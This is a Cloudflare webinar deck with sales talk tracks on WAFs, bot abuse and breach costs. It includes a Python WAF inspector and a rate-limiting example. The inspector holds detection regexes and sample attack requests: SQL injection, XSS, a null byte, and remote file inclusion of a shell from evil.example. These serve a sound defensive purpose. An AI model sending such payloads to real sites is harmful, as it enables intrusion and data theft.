Preventing data breaches and stopping malicious bots has become a top priority for many companies. Cloudflare blocks over 400 million malicious requests each day and from this we know that installing and forgetting a Web Application Firewall is no longer enough. In order to keep up, rules must not only be updated and monitored constantly, but they must also be augmented with other security services to provide an effective solution.
3. Agenda
● Housekeeping
● Why a WAF?
● Current Security Threats
● Business Impacts
● Finding an Intelligent WAF
● Necessary Surrounding Services
● Q & A
4. Housekeeping
● Ask questions in the “Questions” chat box in ReadyTalk.
● We’ll triage all questions at the end of the presentation.
● We’ll be emailing the slides and recording to all registrants.
● All attendees are muted.
6. Why did you originally buy a WAF?
Protect applications from targeted attacks
Malicious Payloads: SQLi, null bytes, malformed data, XSS
Keep customers and their data secure
Protect website from defacement or content theft
8. Customers’ Security Threats
● DDoS Attack: attack traffic impacts availability or performance
● Data Theft Attempt: compromise of sensitive customer data
● Bots: prevent malicious bots from abusing the site or application
9. Compromise of Sensitive Customer Data
(diagram: attacker, visitors, fake website and the four attack paths below)
1. DNS Spoofing: visitors are sent to a fake website
2. Data Snooping
3. Malicious Payload, e.g. SQLi that exfiltrates PII and credentials
4. Bots / Brute Force
10. Malicious Bot Attacks
● Account Takeover: taking over an account to abuse the site, make fraudulent purchases, or extract the user’s financial information
● Content Scraping: stealing public information on the website such as prices or valuable SEO content, which reappears on a website with stolen content
● Checkout Fraud: automated purchasing of valuable or limited inventory, which the bot operator then resells
12. Business Impacts
● Lost customer trust and degraded brand value
● Lost revenue from site downtime or higher costs from bad traffic
Business Impact
● $141 average cost for each lost or stolen record containing sensitive and confidential information
● $3.62 million is the average total cost of a data breach
Cost categories: remediation costs (hardware, services, and software), lost revenue, lost future revenue from customer churn, wasted marketing spend, negative brand impact, help desk costs, increased IT staffing costs, loss of user productivity
Sources: IDC, March 2015, and Ponemon Institute, June 2017
19. Cloudflare Solution to Protect Sensitive Customer Data
ATTACKS and CLOUDFLARE SOLUTIONS
1. Attackers try to forge DNS answers to intercept customer credentials. Solution: resilient DNS and DNSSEC prevent forged answers
2. Snoop unencrypted sensitive data entered by customers. Solution: encryption through SSL/TLS blocks snooping
3. Brute-force their way into login pages. Solution: log-in protection through rate limiting
4. Inject malicious payloads through forms and APIs. Solution: block top OWASP and emerging application-level attacks through the WAF
● Layered defense to protect against sophisticated attackers
● Single control plane for more robust and agile security policies
● Learning from attack profiles across 6M websites to keep yours safe
20. Cloudflare Solution to Prevent Malicious Bots
ATTACKS
1. Account takeovers
2. Content scraping
3. Fraudulent checkout
CLOUDFLARE SOLUTIONS
● Dynamic scoring of IP reputation
● Fingerprinting bad behavior across the network
● Global intelligence across 6M websites and 400B daily requests
● Block known bad signatures with proactive shared intelligence
● Block brute-force login with rate limiting
22. The Cloudflare Advantage
Integrated Performance, Security, and Reliability
(diagram: services around a global Anycast network and China network: DNS, TLS, Firewall, DDoS, WAF, Rate Limiting, Load Balancing, CDN, Content Optimization, Argo, AMP, Latest Web Standards)
● SCALE: 7M customers and routing traffic for 2.5; 120+ data centers with 10 Tbps capacity; 10% of HTTP Internet traffic; 38% of all DNS queries
● INTEGRATED STACK
● EASY FINE-GRAINED CONTROL
Talk Track:
In light of this growing exposure to security risks, what are those primary threats you may encounter?
We spent time talking with OUR customers across different verticals to truly understand the most common fears. These match what industry analysts are reporting:
Site is unavailable because of denial of service attack
Customer data is compromised (e.g. breached or stolen)
Increasingly, abusive bot activity
For each of these broad types of threats, we’ll quickly go into more detail about what those types of threats or attacks could look like.
Questions:
Which, if any, of these are most important for you?
For the others, do you anticipate they could become problems or think they won’t impact your business? And if so, why?
If there was a pre-call…”I know you shared initial concerns about DDoS, what about data compromise?”
Talk Track:
When it comes to compromise of sensitive customer data, you may be most familiar with malware.
While that’s a very visible form of attack right now, we should consider that there are other common, just not as media-hyped, forms of customer data theft.
The take-away for this slide is that attackers can take advantage of different vulnerabilities.
DNS Spoofing: visitors are directed to a fake site instead of your site
A compromised DNS record, or "poisoned cache," can return a malicious answer from the DNS server, sending an unsuspecting visitor to an attacker's site. This enables attackers to steal user credentials and then take over legitimate accounts.
Data Snooping: sensitive data like visitors’ credentials or credit cards are snooped over the wire
Attackers can intercept or "snoop" on customer sessions to steal sensitive customer data, including credentials such as passwords or credit card numbers.
Brute Force: attackers repeatedly try credentials to take over an account
Attackers automate login attempts, guessing passwords from a word list ("dictionary attacks") or replaying credentials dumped from other breaches, to "brute force" their way through a login-protected page.
Malicious Payload: SQL injection, cross-site scripting, or remote file inclusion that results in exfiltrated data
Malicious payloads exploit an application vulnerability. The most common forms are SQL injection, cross-site scripting, and remote file inclusion. Each can exfiltrate sensitive data: SQL injection by running attacker-supplied queries against the database, cross-site scripting by running attacker-supplied script in the user's browser, and remote file inclusion by running attacker-supplied code on the application server.
The risk is that sensitive customer data, such as credit card information, might get compromised.
Talk Track:
The third attack: increasingly, bots are becoming a more common form of attack.
The three most common we have seen and blocked are:
Content scraping: which essentially steals website content and hurts SEO or revenue
Checkout fraud: the most common is the “sneaker bot,” which takes limited inventory and buys it before actual customers can get it
Account takeover: typically the result of a brute-force login, after which the compromised account is used
Talk Track:
So what happens when you experience one or more of these problems we just discussed? Many of our customers shared with us they have both intangible and tangible costs.
You can see some of the potential cost categories and, if you are interested, we can schedule time with your team to get a better handle on the costs if you don’t know details right now.
However, for the purposes of this conversation, we’ve found it’s often helpful to think about and to discuss the potential costs. The areas of cost can range, as you can see on the list, from remediation costs to loss of user productivity. It doesn’t need to be accurate. But reviewing these can reveal whether the problem is a one-hundred dollar a month problem, or a one-hundred thousand dollar a month problem.
Some questions include:
What is the cost for an hour of downtime due to a DDoS in lost customers?
What would be the cost if just one customer record were breached in terms of remediation or customer churn?
What happens to revenue or your brand when malicious bots abuse your site?
Source:
IDC, March 2015: “DevOps and the Cost of Downtime: Fortune 1000 Best Practice Metrics Quantified”, Stephen Elliot. This was commissioned by AppDynamics
Ponemon Institute, 2017
Internal background reading - Enablement:
These are discovery/conversation slides
This is very important. You will have a more difficult time ultimately doing the sale or upsell without it unless the customer’s hair is on fire to buy something.
On the right hand side are the types of costs to explore with customers. Potential responses from customers and options for responses:
If the customer responds: I don’t know
“That’s fine. I could imagine the person who would know would be interested. Could we include him in future meetings as a way to help you get the answers?”
“I understand. Who would know about these numbers in your organization?”
“Sure. Do you think you could make an educated guess? Is this $5 per incident or $50,000 per incident?”
We have found that it’s valuable for companies to quickly get a sense of the business impacts you most care about.
These two were consistently what customers shared as big concerns, whether they use Cloudflare or not.
Which of these are important to you?
What connection do you see between these and downtime from DoS and breached customer data?
Who in the org cares about these impacts?
Here are some examples from conversations with existing customers:
Trust
A financial services customer said loss of trust would directly impact customers and revenue
A medical ecommerce customer said losing trust would be “game over” as a business
A hospitality company values the brand as key to their business, and downtime hurts the brand
A media site said losing the trust of readers as a news site by being down would impact short-term ad revenues and long-term brand (which impacted advertisers)
Trust goes down, revenue goes down in every case
If you had to give a dollar amount of the impact, what would it be?
Notes: Are costs critical to the buying decision?
Costs could be the increased costs of backend servers during attacks
-- For example, the service Have I Been Pwned saw a 5x increase in Azure service costs due to attacks
-- A media company customer saw bandwidth costs increase 1000x from attack traffic
Revenue could be the impact during an outage
Downtime for many companies, from e-commerce, to SaaS, to ad-driven businesses, can be in the tens of thousands of dollars, due to lost customers, lost ad dollars
If you have to pick an area with the biggest potential impact, which would it be?
RESEARCH from competitors:
The average global cost of data breach per lost or stolen record was $141. However, health care organizations had an average cost of $380 and in financial services the average cost was $245. Media ($119), research ($101) and public sector ($71) had the lowest average cost per lost or stolen record.
2017 Cost of Data Breach Study Global Overview Benchmark research sponsored by IBM Security Independently conducted by Ponemon Institute LLC June 2017
https://www.theatlantic.com/technology/archive/2016/10/a-lot/505025/
https://www.ponemon.org/blog/2014-cost-of-data-breach-united-states
https://security.radware.com/uploadedFiles/Resources_and_Content/Attack_Tools/CyberSecurityontheOffense.pdf
https://www.corero.com/company/newsroom/press-releases/market-study-indicates-ddos-protection-is-a-high-priority-for-data-centres-hosting-providers-and-network-services-providers/
https://ns-cdn.neustar.biz/creative_services/biz/neustar/www/resources/whitepapers/it-security/ddos/2015-oct-ddos-report.pdf
Talk Track
Earlier we discussed four common vectors for attacks that compromise or steal sensitive data.
The take-away for this slide is this: when there are multiple vectors, you need a layered defense.
To defend against malicious payloads, you need a WAF: the WAF checks each request against rule sets covering the OWASP Top 10 before it reaches the application
To prevent unintended snooping of data, you need easy to manage and deploy encryption: TLS encrypts the content in transit, so it protects against sniffing
To block brute force logins, you need rate-based log-in protection: Rate Limiting counts requests against a threshold volume to protect against DDoS, brute force or scraping
To prevent forged DNS answers that can send customers to a fake site, you need resilient DNS and DNSSEC: DNS resolves the name to the address the request goes to, and signed DNS stops an attacker from substituting a different one
All these work seamlessly and are easy to set up and configure through the Cloudflare UI as well as through a rich set of APIs.
The high level takeaways are:
Multiple attack vectors
Cloudflare has layered defense
Easy to configure across all services
Learn across 6M websites
Background Reading - you can build this into your talk track:
Reduce risks of data compromise through layered defense
Attackers often use several attack vectors when attempting to compromise customer data. To protect themselves, companies need a layered defense.
REDUCE SPOOFING THROUGH SECURE DNS
Cache poisoning or "spoofing" tricks unsuspecting site visitors into entering sensitive data, such as credit card numbers, into an attacker's site. This type of attack occurs when an attacker poisons the cache of a DNS name server with incorrect records. Until the cache entry expires, that name server will return the fake DNS records. Instead of being directed to the correct site, visitors are routed to an attacker's site, allowing the bad actor to extract sensitive data.
DNSSEC verifies DNS records using cryptographic signatures. By checking the signature associated with a record, DNS resolvers can verify that the requested information comes from its authoritative name server and not from a man-in-the-middle attacker. The check only helps visitors whose resolver actually validates, so signing the zone is necessary but not sufficient on its own.
REDUCE SNOOPING THROUGH ENCRYPTION
Attackers can intercept or "snoop" on customer sessions to steal sensitive customer data, including credentials such as passwords or credit card numbers. In the case of a "man-in-the-middle" attack, the browser thinks it is talking to the server on an encrypted channel, and the server thinks it is talking to the browser, but they are both talking to the attacker who is sitting in the middle. All traffic passes through this man-in-the-middle, who is able to read and modify any of the data.
Fast encryption/termination, easy certificate management, and support for the latest security standards enable customers to secure transmission of user data. One check worth making: when TLS is terminated at the edge, the edge-to-origin leg must also be encrypted and the origin certificate validated, otherwise the snooping problem just moves to that hop.
BLOCK MALICIOUS PAYLOADS THROUGH AUTO-UPDATED, SCALABLE WAF
Attackers exploit application vulnerabilities by submitting malicious payloads that extract sensitive data from the database or the user's browser, or that inject malware to compromise the targeted systems.
A Web Application Firewall (WAF) examines web traffic looking for suspicious activity and filters out illegitimate requests based on the rule sets you ask it to apply. It inspects the URL, headers and body of HTTP requests (GET and POST alike) and applies a rule set, such as the OWASP ModSecurity Core Rule Set covering the OWASP Top 10, to decide whether to block, challenge or let each request pass. It can block comment spam, cross-site scripting attacks and SQL injections. Two practical caveats: signature rules must be applied to the decoded request (including double URL-encoding) or trivial evasions slip through, and a WAF mitigates exploitation of a vulnerability rather than fixing it, so the application bug still needs to be patched.
The Cloudflare Web Application Firewall (WAF) updates rules based on threats observed across its 6M customers, and can protect customers without hurting application performance because of its low-latency inspection and integration with traffic acceleration.
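To make the inspection step above concrete, here is an added example of a minimal signature-based inspector; it is not Cloudflare's WAF or the Core Rule Set, and the rule ids, patterns and sample requests are constructed for this example. It parses a raw HTTP request, decodes every attacker-controlled field (path, query and form parameters, a few headers), decodes repeatedly so double-encoded payloads are seen, and reports which rule fired where.

```python
"""Minimal signature-based WAF inspector (added example, not Cloudflare's WAF).

A handful of illustrative regex rules in the spirit of the OWASP ModSecurity
Core Rule Set are applied to every decoded field of a raw HTTP request. Rule
ids and the sample requests below are made up for this example.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# (rule id, description, pattern). Rules match "name=decoded value" so a rule
# can also key on the parameter name (see rfi-001).
RULES = [
    ("sqli-001", "quote + boolean tautology, or SQL comment / stacked query",
     re.compile(r"""['"]\s*(or|and)\s+['"\w]+\s*=\s*['"\w]+|--\s|/\*.*?\*/|;\s*(drop|union|select)\b""", re.I)),
    ("sqli-002", "UNION ... SELECT",
     re.compile(r"\bunion\b.{0,20}\bselect\b", re.I | re.S)),
    ("xss-001", "script tag, event handler or javascript: URL",
     re.compile(r"<\s*script\b|\bon\w+\s*=|javascript\s*:", re.I)),
    ("nul-001", "null byte (truncation / filter bypass)",
     re.compile(r"\x00")),
    ("rfi-001", "URL passed to an include-style parameter",
     re.compile(r"^(page|file|include|template|path)=(https?|ftp)://", re.I)),
]


def _decode(value, rounds=3):
    """Percent-decode repeatedly (bounded) so double-encoded payloads are matched."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, [(location, name, value), ...])."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    fields = [("path", "", url.path)]
    fields += [("query", k, v) for k, v in parse_qsl(url.query, keep_blank_values=True)]
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        fields += [("body", k, v) for k, v in parse_qsl(body, keep_blank_values=True)]
    # Headers are attacker-controlled too; cookies and UA strings are common carriers.
    fields += [("header", h, headers[h]) for h in ("cookie", "user-agent", "referer") if h in headers]
    return method, fields


def inspect(raw):
    """Return ("block", matches) if any rule fires, else ("allow", [])."""
    _method, fields = parse_request(raw)
    matches = []
    for location, name, value in fields:
        decoded = _decode(value)
        haystack = f"{name}={decoded}" if name else decoded
        for rule_id, _desc, pattern in RULES:
            if pattern.search(haystack):
                matches.append((rule_id, location, name))
    return ("block" if matches else "allow"), matches


# Constructed sample requests (not captured traffic).
BENIGN = ("GET /search?q=blue+running+shoes HTTP/1.1\r\nHost: shop.example\r\n"
          "User-Agent: Mozilla/5.0\r\n\r\n")
SQLI_QUERY = "GET /item?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1\r\nHost: shop.example\r\n\r\n"
SQLI_DOUBLE_ENCODED = ("GET /item?id=1%2527%2520UNION%2520SELECT%2520password%2520FROM%2520users HTTP/1.1\r\n"
                       "Host: shop.example\r\n\r\n")
XSS_BODY = ("POST /comment HTTP/1.1\r\nHost: shop.example\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
            "text=%3Cscript%3Ealert(1)%3C%2Fscript%3E")
NULL_BYTE = "GET /download?file=report.pdf%00.txt HTTP/1.1\r\nHost: shop.example\r\n\r\n"
RFI = "GET /index.php?page=http://evil.example/shell.txt HTTP/1.1\r\nHost: shop.example\r\n\r\n"

if __name__ == "__main__":
    for label, req in [("benign", BENIGN), ("sqli", SQLI_QUERY), ("sqli double-encoded", SQLI_DOUBLE_ENCODED),
                       ("xss body", XSS_BODY), ("null byte", NULL_BYTE), ("rfi", RFI)]:
        print(f"{label:20s} -> {inspect(req)}")
```

The double-encoded SQLi is caught only because `_decode` keeps decoding until the value stops changing; a single decode pass would see `1%27%20UNION...` and let it through. The same breadth that catches that also produces false positives (the `on\w+=` event-handler pattern will fire on a parameter named `onset`, and `rfi-001` on any legitimate URL-valued `page` parameter), which is why production rule sets are tuned per site and why the slide stresses monitoring the rules rather than installing and forgetting them.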
REDUCE ACCOUNT TAKE-OVERS THROUGH LOGIN PROTECTION
Attackers automate login attempts, guessing passwords from a word list ("dictionary attacks") or replaying credentials dumped from other breaches, to "brute force" their way through a login-protected page.
Cloudflare lets users define rate-limiting rules (for example, a threshold on failed-login responses from a single client within a time window) so that these hard-to-detect attacks are identified and blocked at the edge.
Talk Track:
Bots are sophisticated and varied. The most common forms of attack are account takeovers, content scraping and fraudulent checkout.
Because there are different types of attacks, Cloudflare’s approach leverages different forms of defense.
Here’s an example:
Most abusive bots, whether doing fraudulent checkouts or scraping content, generate an unusually high volume of requests from a single source. Our customizable rate limiting solution has solved the problem for customers.
Because of the amount of traffic Cloudflare sees, our IP reputation scoring and behavioral analysis help to block bad traffic sources such as malicious bots.
By combining flexible rules with global shared intelligence, Cloudflare helps customers prevent malicious bots.
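The brute-force login rule described under login protection above and the high-volume bots in this talk track are both handled by the same mechanism, so one worked example covers both. This is an added example, not Cloudflare's rate-limiting implementation: the rule shape (method, path prefix, optional response-status filter, threshold per window, ban duration) is modelled on what edge rate limiting lets you express, and the access-log entries, IP addresses and thresholds are constructed for the example. The limiter decides before the origin is contacted (`allow`) and counts after the origin responds (`record`), which is what lets a login rule count only failed attempts.

```python
"""Sliding-window rate limiting replayed over constructed access-log entries.

Added example, not Cloudflare's implementation. All IPs and numbers are made up.
"""
from collections import defaultdict, deque
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Rule:
    name: str
    method: str
    path_prefix: str
    count_statuses: Optional[frozenset]  # None: count every request; else only these responses
    threshold: int                       # hits per window before the client is banned
    window: float                        # seconds
    ban: float                           # seconds the client stays blocked once tripped


class EdgeRateLimiter:
    def __init__(self, rules):
        self.rules = rules
        self.hits = defaultdict(deque)  # (rule name, client ip) -> recent hit timestamps
        self.banned = {}                # (rule name, client ip) -> ban expiry time

    def _matching(self, method, path):
        return [r for r in self.rules if r.method == method and path.startswith(r.path_prefix)]

    def allow(self, ts, ip, method, path):
        """Decision made before the request is forwarded to the origin."""
        return all(self.banned.get((r.name, ip), 0.0) <= ts for r in self._matching(method, path))

    def record(self, ts, ip, method, path, status):
        """Called with the origin's response; trips the ban once the window count exceeds the threshold."""
        for r in self._matching(method, path):
            if r.count_statuses is not None and status not in r.count_statuses:
                continue
            q = self.hits[(r.name, ip)]
            q.append(ts)
            while q and q[0] <= ts - r.window:   # drop hits that fell out of the window
                q.popleft()
            if len(q) > r.threshold:
                self.banned[(r.name, ip)] = ts + r.ban
                q.clear()


# Hypothetical rules: failed logins (401/403) per client, and raw catalog page volume.
RULES = [
    Rule("login-bruteforce", "POST", "/login", frozenset({401, 403}), threshold=10, window=60, ban=600),
    Rule("catalog-scraper", "GET", "/products/", None, threshold=50, window=10, ban=300),
]


def sample_log():
    """Constructed access-log entries: (epoch seconds, client ip, method, path, status)."""
    entries = []
    # credential-stuffing bot: 15 failed logins in 15 seconds
    entries += [(float(t), "203.0.113.7", "POST", "/login", 401) for t in range(15)]
    # real user: one typo, then a successful login
    entries += [(20.0, "192.0.2.10", "POST", "/login", 401), (25.0, "192.0.2.10", "POST", "/login", 200)]
    # scraper pulling 80 product pages in 8 seconds
    entries += [(100 + i * 0.1, "198.51.100.5", "GET", f"/products/{i}", 200) for i in range(80)]
    # browsing customer: five pages over five seconds
    entries += [(100.0 + i, "192.0.2.20", "GET", f"/products/{i}", 200) for i in range(5)]
    return sorted(entries)


def replay(entries, rules=RULES):
    """Replay the log through the limiter; return blocked-request counts per client ip."""
    limiter = EdgeRateLimiter(rules)
    blocked = {ip: 0 for _, ip, _, _, _ in entries}
    for ts, ip, method, path, status in entries:
        if limiter.allow(ts, ip, method, path):
            limiter.record(ts, ip, method, path, status)
        else:
            blocked[ip] += 1
    return blocked


if __name__ == "__main__":
    for ip, n in replay(sample_log()).items():
        print(f"{ip:15s} blocked {n} requests")
```

Counting 401/403 responses rather than raw POSTs is what keeps the real user at zero blocks even though they hit the same endpoint; a rule on request volume alone would need a much looser threshold. The weakness to keep in mind is that keys are per source IP, so a credential-stuffing campaign spread across thousands of addresses stays under every per-IP threshold, which is exactly where the other two items on the slide, IP reputation and behavioral fingerprinting, have to take over.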